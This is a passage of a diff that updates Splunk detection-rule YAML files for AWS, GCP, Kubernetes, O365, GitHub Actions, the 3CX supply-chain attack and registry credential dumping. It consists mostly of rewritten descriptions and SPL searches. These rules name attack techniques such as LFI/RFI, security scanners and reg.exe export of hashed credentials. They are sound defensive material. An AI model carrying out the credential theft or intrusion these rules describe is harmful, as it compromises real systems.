this could lead to data exfiltration, unauthorized data manipulation, or further
compromise of the GCP environment.
data_source: []
search: '`google_gcp_pubsub_message` | multikv | rename sc_status_ as status | rename
cs_object_ as bucket_name | rename c_ip_ as remote_ip | rename cs_uri_ as request_uri
@@ -1,12 +1,17 @@
name: Detect New Open GCP Storage Buckets
id: f6ea3466-d6bb-11ea-87d0-0242ac130003
version: 1
date: '2020-08-05'
version: 2
date: '2024-05-17'
author: Shannon Davis, Splunk
status: experimental
type: TTP
description: This search looks for GCP PubSub events where a user has created an open/public
GCP Storage bucket.
description: The following analytic identifies the creation of new open/public GCP
Storage buckets. It leverages GCP PubSub events, specifically monitoring for the
`storage.setIamPermissions` method and checks if the `allUsers` member is added.
This activity is significant because open storage buckets can expose sensitive data
to the public, posing a severe security risk. If confirmed malicious, an attacker
could access, modify, or delete data within the bucket, leading to data breaches
and potential compliance violations.
data_source: []
search: '`google_gcp_pubsub_message` data.resource.type=gcs_bucket data.protoPayload.methodName=storage.setIamPermissions
| spath output=action path=data.protoPayload.serviceData.policyDelta.bindingDeltas{}.action
@@ -1,14 +1,18 @@
name: Detect New Open S3 buckets
id: 2a9b80d3-6340-4345-b5ad-290bf3d0dac4
version: 3
date: '2021-07-19'
version: 4
date: '2024-05-19'
author: Bhavin Patel, Patrick Bareiss, Splunk
status: production
type: TTP
description: This search looks for AWS CloudTrail events where a user has created
an open/public S3 bucket.
data_source:
- AWS CloudTrail PutBucketAcl
description: The following analytic identifies the creation of open/public S3 buckets
in AWS. It detects this activity by analyzing AWS CloudTrail events for `PutBucketAcl`
actions where the access control list (ACL) grants permissions to all users or authenticated
users. This activity is significant because open S3 buckets can expose sensitive
data to unauthorized access, leading to data breaches. If confirmed malicious, an
attacker could read, write, or fully control the contents of the bucket, potentially
leading to data exfiltration or tampering.
data_source: []
search: '`cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw
"(?<json_field>{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{}
| search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI
@@ -62,7 +66,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,14 +1,18 @@
name: Detect New Open S3 Buckets over AWS CLI
id: 39c61d09-8b30-4154-922b-2d0a694ecc22
version: 2
date: '2021-07-19'
version: 3
date: '2024-05-19'
author: Patrick Bareiss, Splunk
status: production
type: TTP
description: This search looks for AWS CloudTrail events where a user has created
an open/public S3 bucket over the aws cli.
data_source:
- AWS CloudTrail PutBucketAcl
description: The following analytic detects the creation of open/public S3 buckets
via the AWS CLI. It leverages AWS CloudTrail logs to identify events where a user
has set bucket permissions to allow access to "AuthenticatedUsers" or "AllUsers."
This activity is significant because open S3 buckets can expose sensitive data to
unauthorized users, leading to data breaches. If confirmed malicious, an attacker
could gain unauthorized access to potentially sensitive information stored in the
S3 bucket, posing a significant security risk.
data_source: []
search: '`cloudtrail` eventSource="s3.amazonaws.com" (userAgent="[aws-cli*" OR userAgent=aws-cli*
) eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp
IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write
@@ -66,7 +70,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,12 +1,18 @@
name: Detect S3 access from a new IP
id: e6f1bb1b-f441-492b-9126-902acda217da
version: 1
date: '2018-06-28'
version: 2
date: '2024-05-19'
author: Bhavin Patel, Splunk
status: experimental
type: Anomaly
description: This search looks at S3 bucket-access logs and detects new or previously
unseen remote IP addresses that have successfully accessed an S3 bucket.
description: The following analytic identifies access to an S3 bucket from a new or
previously unseen remote IP address. It leverages S3 bucket-access logs, specifically
focusing on successful access events (http_status=200). This activity is significant
because access from unfamiliar IP addresses could indicate unauthorized access or
potential data exfiltration attempts. If confirmed malicious, this activity could
lead to unauthorized data access, data theft, or further exploitation of the compromised
S3 bucket, posing a significant risk to sensitive information stored within the
bucket.
data_source: []
search: '`aws_s3_accesslogs` http_status=200 [search `aws_s3_accesslogs` http_status=200
| stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip
@@ -1,14 +1,19 @@
name: Detect Spike in AWS Security Hub Alerts for EC2 Instance
id: 2a9b80d3-6340-4345-b5ad-290bf5d0d222
version: 3
date: '2021-01-26'
version: 4
date: '2024-05-19'
author: Bhavin Patel, Splunk
status: production
type: Anomaly
description: This search looks for a spike in number of of AWS security Hub alerts
for an EC2 instance in 4 hours intervals
data_source:
- AWS Security Hub
description: The following analytic identifies a spike in the number of AWS Security
Hub alerts for an EC2 instance within a 4-hour interval. It leverages AWS Security
Hub findings data, calculating the average and standard deviation of alerts to detect
anomalies. This activity is significant for a SOC as a sudden increase in alerts
may indicate potential security incidents or misconfigurations requiring immediate
attention. If confirmed malicious, this could signify an ongoing attack, leading
to unauthorized access, data exfiltration, or disruption of services on the affected
EC2 instance.
data_source: []
search: '`aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h
_time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account)
as vendor_account values(vendor_region) as vendor_region values(severity) as severity
@@ -52,6 +57,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
sourcetype: aws:securityhub:finding
source: aws_securityhub_finding
@@ -1,12 +1,17 @@
name: Detect Spike in AWS Security Hub Alerts for User
id: 2a9b80d3-6220-4345-b5ad-290bf5d0d222
version: 3
date: '2021-01-26'
version: 4
date: '2024-05-18'
author: Bhavin Patel, Splunk
status: experimental
type: Anomaly
description: This search looks for a spike in number of of AWS security Hub alerts
for an AWS IAM User in 4 hours intervals.
description: The following analytic identifies a spike in the number of AWS Security
Hub alerts for an AWS IAM User within a 4-hour interval. It leverages AWS Security
Hub findings data, calculating the average and standard deviation of alerts to detect
significant deviations. This activity is significant as a sudden increase in alerts
for a specific user may indicate suspicious behavior or a potential security incident.
If confirmed malicious, this could signify an ongoing attack, unauthorized access,
or misuse of IAM credentials, potentially leading to data breaches or further exploitation.
data_source: []
search: '`aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename
findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts
@@ -1,13 +1,17 @@
name: Detect Spike in blocked Outbound Traffic from your AWS
id: d3fffa37-492f-487b-a35d-c60fcb2acf01
version: 1
date: '2018-05-07'
version: 2
date: '2024-05-12'
author: Bhavin Patel, Splunk
status: experimental
type: Anomaly
description: This search will detect spike in blocked outbound network connections
originating from within your AWS environment. It will also update the cache file
that factors in the latest data.
description: The following analytic identifies spikes in blocked outbound network
connections originating from within your AWS environment. It leverages VPC Flow
Logs data from CloudWatch, focusing on blocked actions from internal IP ranges to
external destinations. This detection is significant as it can indicate potential
exfiltration attempts or misconfigurations leading to data leakage. If confirmed
malicious, such activity could allow attackers to bypass network defenses, leading
to unauthorized data transfer or communication with malicious external entities.
data_source: []
search: '`cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12
OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) [search `cloudwatchlogs_vpcflow`
@@ -24,9 +28,8 @@ search: '`cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=17
baseline_blocked_outbound_connections | eval dataPointThreshold = 5, deviationThreshold
= 3 | eval isSpike=if((latestCount > avgBlockedConnections+deviationThreshold*stdevBlockedConnections)
AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | table src_ip]
| stats values(dest_ip) as dest_ip, values(interface_id) as "resourceId"
count as numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip
| `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter`'
| stats values(dest_ip) as dest_ip, values(interface_id) as "resourceId" count as
numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip | `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter`'
how_to_implement: You must install the AWS App for Splunk (version 5.1.0 or later)
and Splunk Add-on for AWS (version 4.4.0 or later), then configure your VPC Flow
logs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit
@@ -49,7 +52,7 @@ tags:
asset_type: AWS Instance
confidence: 50
impact: 50
message: Blocked outbound traffic from your AWS
message: Blocked outbound traffic from your AWS
observable:
- name: resourceId
type: Other
@@ -1,13 +1,18 @@
name: Detect Spike in S3 Bucket deletion
id: e733a326-59d2-446d-b8db-14a17151aa68
version: 1
date: '2018-11-27'
version: 2
date: '2024-05-03'
author: Bhavin Patel, Splunk
status: experimental
type: Anomaly
description: This search detects users creating spikes in API activity related to
deletion of S3 buckets in your AWS environment. It will also update the cache file
that factors in the latest data.
description: The following analytic identifies a spike in API activity related to
the deletion of S3 buckets in your AWS environment. It leverages AWS CloudTrail
logs to detect anomalies by comparing current deletion activity against a historical
baseline. This activity is significant as unusual spikes in S3 bucket deletions
could indicate malicious actions such as data exfiltration or unauthorized data
destruction. If confirmed malicious, this could lead to significant data loss, disruption
of services, and potential exposure of sensitive information. Immediate investigation
is required to determine the legitimacy of the activity.
data_source: []
search: '`cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket
| spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup
@@ -1,13 +1,18 @@
name: GCP Detect gcploit framework
id: a1c5a85e-a162-410c-a5d9-99ff639e5a52
version: 1
date: '2020-10-08'
version: 2
date: '2024-05-14'
author: Rod Soto, Splunk
status: experimental
type: TTP
description: This search provides detection of GCPloit exploitation framework. This
framework can be used to escalate privileges and move laterally from compromised
high privilege accounts.
description: The following analytic identifies the use of the GCPloit exploitation
framework within Google Cloud Platform (GCP). It detects specific GCP Pub/Sub messages
with a function timeout of 539 seconds, which is indicative of GCPloit activity.
This detection is significant as GCPloit can be used to escalate privileges and
facilitate lateral movement from compromised high-privilege accounts. If confirmed
malicious, this activity could allow attackers to gain unauthorized access, escalate
their privileges, and move laterally within the GCP environment, potentially compromising
sensitive data and critical resources.
data_source: []
search: '`google_gcp_pubsub_message` data.protoPayload.request.function.timeout=539s
| table src src_user data.resource.labels.project_id data.protoPayload.request.function.serviceAccountEmail
@@ -1,12 +1,18 @@
name: GCP Kubernetes cluster pod scan detection
id: 19b53215-4a16-405b-8087-9e6acf619842
version: 1
date: '2020-07-17'
version: 2
date: '2024-05-18'
author: Rod Soto, Splunk
status: experimental
type: Hunting
description: This search provides information of unauthenticated requests via user
agent, and authentication data against Kubernetes cluster's pods
description: The following analytic identifies unauthenticated requests to Kubernetes
cluster pods. It detects this activity by analyzing GCP Pub/Sub messages for audit
logs where the response status code is 401, indicating unauthorized access attempts.
This activity is significant for a SOC because it may indicate reconnaissance or
scanning attempts by an attacker trying to identify vulnerable pods. If confirmed
malicious, this activity could lead to unauthorized access, allowing the attacker
to exploit vulnerabilities within the cluster, potentially compromising sensitive
data or gaining control over the Kubernetes environment.
data_source: []
search: '`google_gcp_pubsub_message` category=kube-audit |spath input=properties.log
|search responseStatus.code=401 |table sourceIPs{} userAgent verb requestURI responseStatus.reason
@@ -1,13 +1,17 @@
name: Gdrive suspicious file sharing
id: a7131dae-34e3-11ec-a2de-acde48001122
version: 1
date: '2021-10-24'
version: 2
date: '2024-05-13'
author: Rod Soto, Teoderick Contreras
status: experimental
type: Hunting
description: This search can help the detection of compromised accounts or internal
users sharing potentially malicious/classified documents with users outside your
organization via GSuite file sharing .
description: The following analytic identifies suspicious file-sharing activity on
Google Drive, where internal users share documents with more than 50 external recipients.
It leverages GSuite Drive logs, focusing on changes in user access and filtering
for emails outside the organization's domain. This activity is significant as it
may indicate compromised accounts or intentional data exfiltration. If confirmed
malicious, this behavior could lead to unauthorized access to sensitive information,
data leaks, and potential compliance violations.
data_source: []
search: '`gsuite_drive` name=change_user_access | rename parameters.* as * | search
email = "*@yourdomain.com" target_user != "*@yourdomain.com" | stats count values(owner)
@@ -1,14 +1,18 @@
name: GitHub Actions Disable Security Workflow
id: 0459f1a5-c0ac-4987-82d6-65081209f854
version: 1
date: '2022-04-04'
version: 2
date: '2024-05-17'
author: Patrick Bareiss, Splunk
status: production
type: Anomaly
description: This search detects a disabled security workflow in GitHub Actions. An
attacker can disable a security workflow in GitHub actions to hide malicious code
in it.
data_source:
description: The following analytic detects the disabling of a security workflow in
GitHub Actions. It leverages GitHub logs to identify when a workflow, excluding
those named *security-testing*, is disabled following a push or pull request event.
This activity is significant as it may indicate an attempt by an attacker to conceal
malicious code by disabling security checks. If confirmed malicious, this could
allow the attacker to introduce and persist undetected malicious code within the
repository, potentially compromising the integrity and security of the codebase.
data_source:
- GitHub
search: '`github` workflow_run.event=push OR workflow_run.event=pull_request | stats
values(workflow_run.name) as workflow_run.name by workflow_run.head_commit.id workflow_run.event
@@ -63,6 +67,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/github_actions_disable_security_workflow/github_actions_disable_security_workflow.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/github_actions_disable_security_workflow/github_actions_disable_security_workflow.log
source: github
sourcetype: aws:firehose:json
@@ -1,13 +1,17 @@
name: Gsuite suspicious calendar invite
id: 03cdd68a-34fb-11ec-9bd3-acde48001122
version: 1
date: '2021-10-24'
version: 2
date: '2024-05-21'
author: Rod Soto, Teoderick Contreras
status: experimental
type: Hunting
description: This search can help the detection of compromised accounts or internal
users sending suspcious calendar invites via GSuite calendar. These invites may
contain malicious links or attachments.
description: The following analytic detects suspicious calendar invites sent via GSuite,
potentially indicating compromised accounts or malicious internal activity. It leverages
GSuite calendar logs, focusing on events where a high volume of invites (over 100)
is sent within a 5-minute window. This behavior is significant as it may involve
the distribution of malicious links or attachments, posing a security risk. If confirmed
malicious, this activity could lead to widespread phishing attacks, unauthorized
access, or malware distribution within the organization.
data_source: []
search: '`gsuite_calendar` |bin span=5m _time |rename parameters.* as * |search target_calendar_id!=null
email="*yourdomain.com"| stats count values(target_calendar_id) values(event_title)
@@ -1,21 +1,25 @@
name: Kubernetes Nginx Ingress LFI
id: 0f83244b-425b-4528-83db-7a88c5f66e48
version: 2
date: '2024-03-19'
version: 4
date: '2024-05-19'
author: Patrick Bareiss, Splunk
status: production
type: TTP
description: This search uses the Kubernetes logs from a nginx ingress controller
to detect local file inclusion attacks.
data_source:
- Kubernetes Audit
description: The following analytic detects local file inclusion (LFI) attacks targeting
Kubernetes Nginx ingress controllers. It leverages Kubernetes logs, parsing fields
such as `request` and `status` to identify suspicious patterns indicative of LFI
attempts. This activity is significant because LFI attacks can allow attackers to
read sensitive files from the server, potentially exposing critical information.
If confirmed malicious, this could lead to unauthorized access to sensitive data,
further exploitation, and potential compromise of the Kubernetes environment.
data_source: []
search: '`kubernetes_container_controller` | rex field=_raw "^(?<remote_addr>\S+)\s+-\s+-\s+\[(?<time_local>[^\]]*)\]\s\"(?<request>[^\"]*)\"\s(?<status>\S*)\s(?<body_bytes_sent>\S*)\s\"(?<http_referer>[^\"]*)\"\s\"(?<http_user_agent>[^\"]*)\"\s(?<request_length>\S*)\s(?<request_time>\S*)\s\[(?<proxy_upstream_name>[^\]]*)\]\s\[(?<proxy_alternative_upstream_name>[^\]]*)\]\s(?<upstream_addr>\S*)\s(?<upstream_response_length>\S*)\s(?<upstream_response_time>\S*)\s(?<upstream_status>\S*)\s(?<req_id>\S*)"
| lookup local_file_inclusion_paths local_file_inclusion_paths AS request OUTPUT
lfi_path | search lfi_path=yes | rename remote_addr AS src_ip, upstream_status as
| rename remote_addr AS src_ip, upstream_status as
status, proxy_upstream_name as proxy | rex field=request "^(?<http_method>\S+)\s(?<url>\S+)\s"
| eval phase="operate" | eval severity="high" | stats count min(_time) as firstTime
max(_time) as lastTime by src_ip, status, url, http_method, host, http_user_agent,
proxy, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
proxy, phase, severity, request | lookup local_file_inclusion_paths local_file_inclusion_paths AS request OUTPUT
lfi_path | search lfi_path=yes | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
| `kubernetes_nginx_ingress_lfi_filter`'
how_to_implement: You must ingest Kubernetes logs through Splunk Connect for Kubernetes.
known_false_positives: unknown
@@ -51,6 +55,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kubernetes_nginx_lfi_attack/kubernetes_nginx_lfi_attack.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kubernetes_nginx_lfi_attack/kubernetes_nginx_lfi_attack.log
sourcetype: kube:container:controller
source: kubernetes
@@ -1,14 +1,18 @@
name: Kubernetes Nginx Ingress RFI
id: fc5531ae-62fd-4de6-9c36-b4afdae8ca95
version: 3
date: '2024-03-19'
version: 4
date: '2024-05-19'
author: Patrick Bareiss, Splunk
status: production
type: TTP
description: This search uses the Kubernetes logs from a nginx ingress controller
to detect remote file inclusion attacks.
data_source:
- Kubernetes Audit
description: The following analytic detects remote file inclusion (RFI) attacks targeting
Kubernetes Nginx ingress controllers. It leverages Kubernetes logs from the Nginx
ingress controller, parsing fields such as `remote_addr`, `request`, and `url` to
identify suspicious activity. This activity is significant because RFI attacks can
allow attackers to execute arbitrary code or access sensitive files on the server.
If confirmed malicious, this could lead to unauthorized access, data exfiltration,
or further compromise of the Kubernetes environment.
data_source: []
search: '`kubernetes_container_controller` | rex field=_raw "^(?<remote_addr>\S+)\s+-\s+-\s+\[(?<time_local>[^\]]*)\]\s\"(?<request>[^\"]*)\"\s(?<status>\S*)\s(?<body_bytes_sent>\S*)\s\"(?<http_referer>[^\"]*)\"\s\"(?<http_user_agent>[^\"]*)\"\s(?<request_length>\S*)\s(?<request_time>\S*)\s\[(?<proxy_upstream_name>[^\]]*)\]\s\[(?<proxy_alternative_upstream_name>[^\]]*)\]\s(?<upstream_addr>\S*)\s(?<upstream_response_length>\S*)\s(?<upstream_response_time>\S*)\s(?<upstream_status>\S*)\s(?<req_id>\S*)"
| rex field=request "^(?<http_method>\S+)?\s(?<url>\S+)\s" | rex field=url "(?<dest_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
| search dest_ip=* | rename remote_addr AS src_ip, upstream_status as status, proxy_upstream_name
@@ -50,6 +54,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kuberntest_nginx_rfi_attack/kubernetes_nginx_rfi_attack.log
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kuberntest_nginx_rfi_attack/kubernetes_nginx_rfi_attack.log
sourcetype: kube:container:controller
source: kubernetes
@@ -1,14 +1,19 @@
name: Kubernetes Scanner Image Pulling
id: 4890cd6b-0112-4974-a272-c5c153aee551
version: 1
date: '2021-08-24'
version: 2
date: '2024-05-20'
author: Patrick Bareiss, Splunk
status: production
type: TTP
description: This search uses the Kubernetes logs from Splunk Connect from Kubernetes
to detect Kubernetes Security Scanner.
data_source:
- Kubernetes Audit
description: The following analytic detects the pulling of known Kubernetes security
scanner images such as kube-hunter, kube-bench, and kube-recon. It leverages Kubernetes
logs ingested through Splunk Connect for Kubernetes, specifically monitoring for
messages indicating the pulling of these images. This activity is significant because
the use of security scanners can indicate an attempt to identify vulnerabilities
within the Kubernetes environment. If confirmed malicious, this could lead to the
discovery and exploitation of security weaknesses, potentially compromising the
entire Kubernetes cluster.
data_source: []
search: '`kube_objects_events` object.message IN ("Pulling image *kube-hunter*", "Pulling
image *kube-bench*", "Pulling image *kube-recon*", "Pulling image *kube-recon*")
| rename object.* AS * | rename involvedObject.* AS * | rename source.host AS host
@@ -50,6 +55,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/kubernetes_kube_hunter/kubernetes_kube_hunter.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/kubernetes_kube_hunter/kubernetes_kube_hunter.json
sourcetype: kube:objects:events
source: kubernetes
@@ -1,14 +1,18 @@
name: O365 Excessive Authentication Failures Alert
id: d441364c-349c-453b-b55f-12eccab67cf9
version: 2
date: '2022-02-18'
version: 3
date: '2024-05-18'
author: Rod Soto, Splunk
status: production
type: Anomaly
description: This search detects when an excessive number of authentication failures
occur this search also includes attempts against MFA prompt codes
data_source:
- O365
description: The following analytic identifies an excessive number of authentication
failures, including failed attempts against MFA prompt codes. It uses data from
the `o365_management_activity` dataset, focusing on events where the authentication
status is marked as failure. This behavior is significant as it may indicate a brute
force attack or an attempt to compromise user accounts. If confirmed malicious,
this activity could lead to unauthorized access, data breaches, or further exploitation
within the environment.
data_source: []
search: '`o365_management_activity` Workload=AzureActiveDirectory UserAuthenticationMethod=*
status=failure | stats count earliest(_time) AS firstTime latest(_time) AS lastTime
values(UserAuthenticationMethod) AS UserAuthenticationMethod values(UserAgent) AS
@@ -57,6 +61,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110/o365_brute_force_login/o365_brute_force_login.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110/o365_brute_force_login/o365_brute_force_login.json
sourcetype: o365:management:activity
source: o365
@@ -1,15 +1,24 @@
name: O365 Excessive SSO logon errors
id: 8158ccc4-6038-11eb-ae93-0242ac130002
version: 3
date: '2023-08-02'
version: 4
date: '2024-05-17'
author: Rod Soto, Splunk
status: production
type: Anomaly
description: The following analytic detects accounts with high number of Single Sign ON (SSO)
logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse.
data_source:
description: The following analytic detects accounts experiencing a high number of
Single Sign-On (SSO) logon errors. It leverages data from the `o365_management_activity`
dataset, focusing on failed user login attempts with SSO errors. This activity is
significant as it may indicate brute-force attempts or the hijacking/reuse of SSO
tokens. If confirmed malicious, attackers could potentially gain unauthorized access
to user accounts, leading to data breaches, privilege escalation, or further lateral
movement within the organization.
data_source:
- O365 UserLoginFailed
search: '`o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso* Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip signature user_agent authentication_service action| where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`'
search: '`o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso*
Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime
values(user) as user by src_ip signature user_agent authentication_service action|
where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
| `o365_excessive_sso_logon_errors_filter`'
how_to_implement: You must install splunk Microsoft Office 365 add-on. This search
works with o365:management:activity
known_false_positives: Logon errors may not be malicious in nature however it may
@@ -56,6 +65,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556/o365_sso_logon_errors/o365_sso_logon_errors2.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556/o365_sso_logon_errors/o365_sso_logon_errors2.json
sourcetype: o365:management:activity
source: o365
@@ -1,61 +1,69 @@
name: 3CX Supply Chain Attack Network Indicators
id: 791b727c-deec-4fbe-a732-756131b3c5a1
version: 1
date: "2023-03-30"
version: 2
date: "2024-05-21"
author: Michael Haag, Splunk
type: TTP
status: experimental
data_source:
- Sysmon EventID 22
description: The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises.
search: '| tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query
| `drop_dm_object_name(DNS)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| lookup 3cx_ioc_domains domain as query OUTPUT Description isIOC
| search isIOC=true
| `3cx_supply_chain_attack_network_indicators_filter`'
how_to_implement: To successfully implement this search you need to be ingesting information into the `Network Resolution` datamodel in the `DNS` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA''s are installed.
known_false_positives: False positives will be present for accessing the 3cx[.]com website. Remove from the lookup as needed.
description: The following analytic identifies DNS queries to domains associated with
the 3CX supply chain attack. It leverages the Network_Resolution datamodel to detect
these suspicious domain indicators. This activity is significant because it can
indicate a potential compromise stemming from the 3CX supply chain attack, which
is known for distributing malicious software through trusted updates. If confirmed
malicious, this activity could allow attackers to establish a foothold in the network,
exfiltrate sensitive data, or further propagate malware, leading to extensive damage
and data breaches.
search: '| tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time)
as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name(DNS)`
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | lookup
3cx_ioc_domains domain as query OUTPUT Description isIOC | search isIOC=true | `3cx_supply_chain_attack_network_indicators_filter`'
how_to_implement: To successfully implement this search you need to be ingesting information
into the `Network Resolution` datamodel in the `DNS` node. In addition, confirm
the latest CIM App 4.20 or higher is installed and the latest TA''s are installed.
known_false_positives: False positives will be present for accessing the 3cx[.]com
website. Remove from the lookup as needed.
references:
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
- https://www.cisa.gov/news-events/alerts/2023/03/30/supply-chain-attack-against-3cxdesktopapp
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
- https://www.3cx.com/community/threads/crowdstrike-endpoint-security-detection-re-3cx-desktop-app.119934/page-2#post-558898
- https://www.3cx.com/community/threads/3cx-desktopapp-security-alert.119951/
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
- https://www.cisa.gov/news-events/alerts/2023/03/30/supply-chain-attack-against-3cxdesktopapp
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
- https://www.3cx.com/community/threads/crowdstrike-endpoint-security-detection-re-3cx-desktop-app.119934/page-2#post-558898
- https://www.3cx.com/community/threads/3cx-desktopapp-security-alert.119951/
tags:
analytic_story:
- 3CX Supply Chain Attack
- 3CX Supply Chain Attack
asset_type: Network
confidence: 100
cve:
- CVE-2023-29059
- CVE-2023-29059
impact: 100
message: Indicators related to 3CX supply chain attack have been identified on $src$.
mitre_attack_id:
- T1195.002
- T1195.002
observable:
- name: src
type: Hostname
role:
- Victim
- name: query
type: URL String
role:
- Attacker
- name: src
type: Hostname
role:
- Victim
- name: query
type: URL String
role:
- Attacker
product:
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
- Splunk Enterprise
- Splunk Enterprise Security
- Splunk Cloud
required_fields:
- DNS.src
- DNS.query
- _time
- DNS.src
- DNS.query
- _time
risk_score: 100
security_domain: network
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/3CX/3cx_network-windows-sysmon.log
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
sourcetype: xmlwineventlog
- name: True Positive Test
attack_data:
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/3CX/3cx_network-windows-sysmon.log
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
sourcetype: xmlwineventlog
@@ -1,12 +1,18 @@
name: Attempted Credential Dump From Registry via Reg exe
id: e9fb4a59-c5fb-440a-9f24-191fbc6b2911
version: 7
date: '2023-12-27'
version: 8
date: '2024-05-19'
author: Patrick Bareiss, Splunk
status: production
type: TTP
description: Monitor for execution of reg.exe with parameters specifying an export
of keys that contain hashed credentials that attackers may try to crack offline.
description: The following analytic detects the execution of reg.exe with parameters
that export registry keys containing hashed credentials. It leverages data from
Endpoint Detection and Response (EDR) agents, focusing on command-line executions
involving reg.exe or cmd.exe with specific registry paths. This activity is significant
because exporting these keys can allow attackers to obtain hashed credentials, which
they may attempt to crack offline. If confirmed malicious, this could lead to unauthorized
access to sensitive accounts, enabling further compromise and lateral movement within
the network.
data_source:
- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
@@ -85,11 +91,13 @@ tags:
tests:
- name: True Positive Test
attack_data:
